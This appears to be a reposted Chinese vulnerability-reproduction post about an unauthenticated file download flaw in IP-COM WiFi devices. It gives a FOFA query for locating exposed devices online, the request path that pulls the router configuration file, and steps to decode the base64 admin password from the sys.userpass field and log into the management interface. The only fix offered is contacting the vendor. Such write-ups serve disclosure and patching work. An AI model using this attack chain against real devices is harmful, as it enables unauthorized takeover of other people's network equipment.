本文主要是介绍【漏洞复现】和为顺IP-COM WiFi未授权下载漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Nx01 产品简介
深圳市和为顺网络技术有限公司是一家聚焦于商用级网络通信设备的研发与应用,为全球中小型企业提供高速、安全、易维护的网络设备产品和解决方案的公司。
Nx02 漏洞描述
深圳市和为顺网络技术有限公司IP-COM WiFi方案解决专家存在任意文件下载漏洞,攻击者可利用漏洞获取敏感信息。
Nx03 产品主页
fofa-query: web.title=="IP-COM | Login"
Nx04 漏洞复现
POC:
/cgi-bin/DownloadCfg/RouterCfm.cfg
搜索sys.userpass参数获取base加密密码进行登录后台。
Nx05 修复建议
建议联系软件厂商进行处理。
这篇关于【漏洞复现】和为顺IP-COM WiFi未授权下载漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
